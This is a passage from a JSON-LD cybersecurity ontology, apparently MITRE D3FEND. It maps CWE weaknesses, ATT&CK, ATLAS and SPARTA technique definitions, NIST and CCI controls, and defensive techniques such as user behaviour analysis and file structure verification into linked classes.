        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:FileSection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file section is one of the portions of a file in which the file is regarded as divided and where together the file sections constitute the whole file.",
      "rdfs:label": "File Section",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05876035-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "File Part"
    },
    {
      "@id": "d3f:RDPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Remote Desktop Protocol (RDP), a communication protocol developed by Microsoft that facilitates secure remote access to graphical interfaces on desktops or applications hosted on remote servers. RDP supports multi-channel communication for transferring input, output, and management commands.",
      "rdfs:label": "RDP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/rdp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "_:N13f7f8b2d11542319909992da79d27a1"
        },
        {
          "@id": "_:N2b1c06f4e46d4fdabbbfb2664fc36f02"
        }
      ]
    },
    {
      "@id": "_:N13f7f8b2d11542319909992da79d27a1",
      "@type": "owl:Class",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "d3f:TCPEvent"
          },
          {
            "@id": "d3f:UDPEvent"
          }
        ]
      }
    },
    {
      "@id": "_:N2b1c06f4e46d4fdabbbfb2664fc36f02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPSession"
      }
    },
    {
      "@id": "d3f:UserManualReference",
      "@type": "owl:Class",
      "d3f:pref-label": "User Manual",
      "rdfs:label": "User Manual Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:T1099",
      "@type": "owl:Class",
      "d3f:attack-id": "T1099",
      "d3f:definition": "Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.006",
      "rdfs:label": "Timestomp",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:PhysicalLinkDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An administrator issues a shutdown or disable command, forcing the link out of service regardless of signal status.",
      "rdfs:label": "Physical Link Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:Naf358ffd3cdc47df9dc697b6d1292409"
        }
      ]
    },
    {
      "@id": "_:Naf358ffd3cdc47df9dc697b6d1292409",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkUpEvent"
      }
    },
    {
      "@id": "d3f:UserBehaviorAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserBehaviorAnalysis"
      ],
      "d3f:d3fend-id": "D3-UBA",
      "d3f:definition": "User behavior analytics (\"UBA\"), as defined by Gartner, is a cybersecurity process about detection of insider threats, targeted attacks, and financial fraud. UBA solutions look at patterns of human behavior, and then apply algorithms and statistical analysis to detect meaningful anomalies from those patterns — anomalies that indicate potential threats. Instead of tracking devices or security events, UBA tracks a system's users. Big data platforms are increasing UBA functionality by allowing them to analyze petabytes worth of data to detect insider threats and advanced persistent threats.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\n\nSome techniques monitor patterns of human behavior and then apply algorithms to identify patterns such as repeated login attempts from a single IP address, large file downloads, or abnormal accesses.\n\nOther techniques may have explicit or rigid definitions of \"bad behavior\" which are then matched against instances in a computer network environment.",
      "d3f:synonym": [
        "Credential Monitoring",
        "UBA"
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_behavior_analytics"
      },
      "rdfs:label": "User Behavior Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N5795a8295b39455da3dc403efd7e3c7f"
        }
      ]
    },
    {
      "@id": "_:N5795a8295b39455da3dc403efd7e3c7f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance | Automated Support for Predictive Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6(3)"
    },
    {
      "@id": "d3f:CCI-001084_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system isolates security functions from nonsecurity functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001084"
    },
    {
      "@id": "d3f:ApplicationConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the configuration of a specific software application is changed, affecting how that application executes, interacts with other components, or exposes functionality to users or services.",
      "rdfs:label": "Application Configuration Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationModificationEvent"
        },
        {
          "@id": "_:N817d314aaf7c4f249a9c186870e7c7ea"
        },
        {
          "@id": "_:N525f0fb659134799a449f1f13950f46e"
        }
      ]
    },
    {
      "@id": "_:N817d314aaf7c4f249a9c186870e7c7ea",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "_:N525f0fb659134799a449f1f13950f46e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationUpdateEvent"
      }
    },
    {
      "@id": "d3f:DatabaseQuery",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A specific query expressed in SQL, SPARQL, or similar language against a database.",
      "d3f:queries": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Database Query",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Command"
        },
        {
          "@id": "_:N9b6734b7043e4d7883b76583dab87353"
        }
      ]
    },
    {
      "@id": "_:N9b6734b7043e4d7883b76583dab87353",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:T1116",
      "@type": "owl:Class",
      "d3f:attack-id": "T1116",
      "d3f:definition": "Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.002",
      "rdfs:label": "Code Signing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ProcessTree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Process"
      },
      "d3f:definition": "A process tree is a tree structure representation of parent-child relationships established via process spawn operations.",
      "rdfs:label": "Process Tree",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        },
        {
          "@id": "dbr:Child_process"
        },
        {
          "@id": "dbr:Parent_process"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N94a9d75847b342dc9af90d2b29bb456c"
        }
      ]
    },
    {
      "@id": "_:N94a9d75847b342dc9af90d2b29bb456c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-209",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-209",
      "d3f:definition": "The product generates an error message that includes sensitive information about its environment, users, or associated data.",
      "rdfs:label": "Generation of Error Message Containing Sensitive Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-200"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:Summarizing",
      "@type": "owl:Class",
      "rdfs:label": "Summarizing",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:ActivePhysicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ActivePhysicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-APLM",
      "d3f:definition": "Active physical link mapping sends and receives network traffic as a means to map the physical layer.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IdentificationOfTracerouteNodesAndAssociatedDevices"
        },
        {
          "@id": "d3f:Reference-UsingSpanningTreeProtocolSTPToEnhanceLayer2NetworkTopologyMaps"
        }
      ],
      "d3f:may-query": {
        "@id": "d3f:NetworkAgent"
      },
      "d3f:synonym": "Active Physical Layer Mapping",
      "owl:disjointWith": {
        "@id": "d3f:DirectPhysicalLinkMapping"
      },
      "rdfs:label": "Active Physical Link Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkMapping"
        },
        {
          "@id": "_:Ne626638544424dbfbd17748d11128077"
        }
      ]
    },
    {
      "@id": "_:Ne626638544424dbfbd17748d11128077",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-query"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:CWE-587",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-587",
      "d3f:definition": "The product sets a pointer to a specific address other than NULL or 0.",
      "rdfs:label": "Assignment of a Fixed Address to a Pointer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-344"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:CWE-244",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-244",
      "d3f:definition": "Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.",
      "rdfs:label": "Improper Clearing of Heap Memory Before Release ('Heap Inspection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:CWE-792",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-792",
      "d3f:definition": "The product receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component.",
      "rdfs:label": "Incomplete Filtering of One or More Instances of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-791"
      }
    },
    {
      "@id": "d3f:CWE-97",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-97",
      "d3f:definition": "The product generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.",
      "rdfs:label": "Improper Neutralization of Server-Side Includes (SSI) Within a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-96"
      }
    },
    {
      "@id": "d3f:attack-may-be-countered-by",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "attack-may-be-countered-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-tactically-associated-with"
      }
    },
    {
      "@id": "d3f:EXF-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0003",
      "d3f:definition": "The adversary captures mission traffic in transit, on ground networks or over the space link, so that payload products, housekeeping, and command/ack exchanges can be reconstructed offline. Vantage points include tapped ground LANs/WANs between MOC and stations, baseband interfaces (IF/IQ), RF/optical receptions within the antenna field of view, and crosslink monitors. Depending on protection, the haul ranges from plaintext frames to encrypted bitstreams whose headers, rates, and schedules still yield valuable context (APIDs, VCIDs, pass timing, file manifest cues). Intercepted sessions can guide later replay, cloning, or targeted downlink requests.",
      "rdfs:label": "Signal Interception - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Signal Interception"
    },
    {
      "@id": "d3f:CWE-1287",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1287",
      "d3f:definition": "The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.",
      "rdfs:label": "Improper Validation of Specified Type of Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:T1573.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1573.001",
      "d3f:creates": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "d3f:definition": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
      "rdfs:label": "Symmetric Cryptography",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1573"
        },
        {
          "@id": "_:N2ba8ad22e4b9464d80b131b25d82e693"
        }
      ]
    },
    {
      "@id": "_:N2ba8ad22e4b9464d80b131b25d82e693",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:RDPSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Remote Desktop Protocol (RDP) session is a session established using the RDP protocol to access Remote Desktop Services (RDS).",
      "rdfs:label": "RDP Session",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Remote_Desktop_Protocol"
        },
        {
          "@id": "dbr:Remote_Desktop_Services"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteSession"
      },
      "skos:altLabel": [
        "Remote Desktop Session",
        "Terminal Services"
      ]
    },
    {
      "@id": "d3f:CCI-001117_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system checks incoming communications to ensure the communications are coming from an authorized source and routed to an authorized destination.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001117"
    },
    {
      "@id": "d3f:DS0001",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI",
      "rdfs:comment": "This data source captures events relating to firmware and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Firmware (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-425",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-425",
      "d3f:definition": "The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.",
      "d3f:synonym": "forced browsing",
      "rdfs:label": "Direct Request ('Forced Browsing')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-288"
        },
        {
          "@id": "d3f:CWE-424"
        },
        {
          "@id": "d3f:CWE-862"
        }
      ]
    },
    {
      "@id": "d3f:ControlCatalog",
      "@type": "owl:Class",
      "d3f:definition": "A control catalog is a complete list of protective measures for systems, organizations, or individuals for subject domains (e.g., security and privacy).",
      "rdfs:label": "Control Catalog",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06499734-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControlThing"
        },
        {
          "@id": "_:Nde7ef0c3984b4f82924e8b9fc00462b9"
        },
        {
          "@id": "_:N81991b4df1174161818457bbdeaf1e20"
        }
      ]
    },
    {
      "@id": "_:Nde7ef0c3984b4f82924e8b9fc00462b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExternalControl"
      }
    },
    {
      "@id": "_:N81991b4df1174161818457bbdeaf1e20",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:version"
      },
      "owl:someValuesFrom": {
        "@id": "_:N81f12ffd1b544e348a27ac09fc332c6e"
      }
    },
    {
      "@id": "_:N81f12ffd1b544e348a27ac09fc332c6e",
      "@type": "rdfs:Datatype",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "xsd:integer"
          },
          {
            "@id": "xsd:string"
          }
        ]
      }
    },
    {
      "@id": "d3f:FileInternalStructureVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileInternalStructureVerification"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileContentBlock"
      },
      "d3f:d3fend-id": "D3-FISV",
      "d3f:definition": "The process of checking specific static values within a file, such as file signatures or magic numbers, to ensure they match the expected values defined by the file format specification.",
      "d3f:kb-article": "## How it works\n\nFile format specifications often define expected values for specific fields. A common example is file signatures, or magic numbers, which are used to quickly identify files. Another example is the Compound Document Header of Microsoft Office files, in which the 29th and 30th bytes identify the byte order, specifically 0xFFFE for little-endian. This technique verifies that the file's static values match the values of the declared file format's specification.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
        }
      ],
      "rdfs:label": "File Internal Structure Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:Nf99c6f0c82e34c8a811c3493e10922c1"
        }
      ]
    },
    {
      "@id": "_:Nf99c6f0c82e34c8a811c3493e10922c1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlock"
      }
    },
    {
      "@id": "d3f:process-security-context",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-security-context y: The process x has the process security context data y.",
      "rdfs:domain": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "process-security-context",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      }
    },
    {
      "@id": "d3f:OSAPIGetSystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that retrieves the current system time or timestamp.",
      "d3f:invokes": {
        "@id": "d3f:GetSystemTime"
      },
      "rdfs:label": "OS API Get System Time",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N01c71b3d3c62496688813c3a57b8c319"
        }
      ]
    },
    {
      "@id": "_:N01c71b3d3c62496688813c3a57b8c319",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemTime"
      }
    },
    {
      "@id": "d3f:Reference-UseRkillToStopMalwareProcesses-Ghacks.net",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ghacks.net/2011/07/29/use-rkill-to-stop-malware-processes/"
      },
      "d3f:kb-author": "Melanie Gross",
      "d3f:kb-organization": "ghacks.net",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:kb-reference-title": "Use Rkill to Stop Malware Processes",
      "rdfs:label": "Reference - Use Rkill to Stop Malware Processes - ghacks.net"
    },
    {
      "@id": "d3f:CWE-483",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-483",
      "d3f:definition": "The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error.",
      "rdfs:label": "Incorrect Block Delimitation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_10",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:control-name": "Information Flow Enforcement | Enable and Disable Security or Privacy Policy Filters",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-4(10)"
    },
    {
      "@id": "d3f:InternationalizedDomainName",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "rdfs:label": "Internationalized Domain Name"
    },
    {
      "@id": "d3f:ATTACKMobileExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0036"
      },
      "rdfs:label": "Exfiltration Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:Nbd5f8dfcf28f4205863eaf435cbfa468"
        }
      ],
      "skos:prefLabel": "Exfiltration Technique"
    },
    {
      "@id": "_:Nbd5f8dfcf28f4205863eaf435cbfa468",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0036"
      }
    },
    {
      "@id": "d3f:CCI-001953_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system accepts Personal Identity Verification (PIV) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001953"
    },
    {
      "@id": "d3f:AML.T0002.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0002.001",
      "d3f:definition": "Adversaries may acquire public models to use in their operations.\nAdversaries may seek models used by the victim organization or models that are representative of those used by the victim organization.\nRepresentative models may include model architectures, or pre-trained models which define the architecture as well as model parameters from training on a dataset.\nThe adversary may search public sources for common model architecture configuration file formats such as YAML or Python configuration files, and common model storage file formats such as ONNX (.onnx), HDF5 (.h5), Pickle (.pkl), PyTorch (.pth), or TensorFlow (.pb, .tflite).\n\nAcquired models are useful in advancing the adversary's operations and are frequently used to tailor attacks to the victim model.",
      "rdfs:label": "Models - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0002.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0002"
      },
      "skos:prefLabel": "Models"
    },
    {
      "@id": "d3f:OTProcessVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Process variables are the current actual measurement of the physical characteristics of a system. Common process variables include but are not limited to Temperature, Pressure, Level, and Flow.",
      "rdfs:label": "OT Process Variable",
      "rdfs:seeAlso": {
        "@id": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OTLogicVariable"
      },
      "skos:example": "If the current temperature in a home is 82 degrees Fahrenheit, the process variable is 82 degrees."
    },
    {
      "@id": "d3f:VolumeBootRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A volume boot record (VBR) (also known as a volume boot sector, a partition boot record or a partition boot sector) is a type of boot sector introduced by the IBM Personal Computer. It may be found on a partitioned data storage device, such as a hard disk, or an unpartitioned device, such as a floppy disk, and contains machine code for bootstrapping programs (usually, but not necessarily, operating systems) stored in other parts of the device. On non-partitioned storage devices, it is the first sector of the device. On partitioned devices, it is the first sector of an individual partition on the device, with the first sector of the entire device being a Master Boot Record (MBR) containing the partition table.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Volume_boot_record"
      },
      "rdfs:label": "Volume Boot Record",
      "rdfs:subClassOf": {
        "@id": "d3f:BootRecord"
      }
    },
    {
      "@id": "d3f:NetworkFrame",
      "@type": "owl:Class",
      "d3f:definition": "A finite, self-delimited sequence of bits exchanged as one unit over a single data link. Formed by link-layer encapsulation, a frame typically begins with synchronization and control fields, carries a payload, ends with an integrity check, and is bounded from adjacent frames by explicit timing or delimiter symbols.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Frame_(networking)"
      },
      "rdfs:label": "Network Frame",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Frame"
    },
    {
      "@id": "d3f:CCI-001144_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements required cryptographic protections using cryptographic modules that comply with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001144"
    },
    {
      "@id": "d3f:AML.T0024",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024",
      "d3f:definition": "Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).\nAI Models have been shown to leak private information about their training data (e.g. [Infer Training Data Membership](/techniques/AML.T0024.000), [Invert AI Model](/techniques/AML.T0024.001)).\nThe model itself may also be extracted ([Extract AI Model](/techniques/AML.T0024.002)) for the purposes of [AI Intellectual Property Theft](/techniques/AML.T0048.004).\n\nExfiltration of information relating to private training data raises privacy concerns.\nPrivate training data may include personally identifiable information, or other protected data.",
      "rdfs:label": "Exfiltration via AI Inference API - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration via AI Inference API"
    },
    {
      "@id": "d3f:T1059.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.009",
      "d3f:definition": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).",
      "rdfs:label": "Cloud API",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:T1070.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.006",
      "d3f:definition": "Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.",
      "d3f:forges": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Timestomp",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:Neb6a51e7138d4c0483c7221dc84f1783"
        }
      ]
    },
    {
      "@id": "_:Neb6a51e7138d4c0483c7221dc84f1783",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:TA0028",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Persistence - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Persistence"
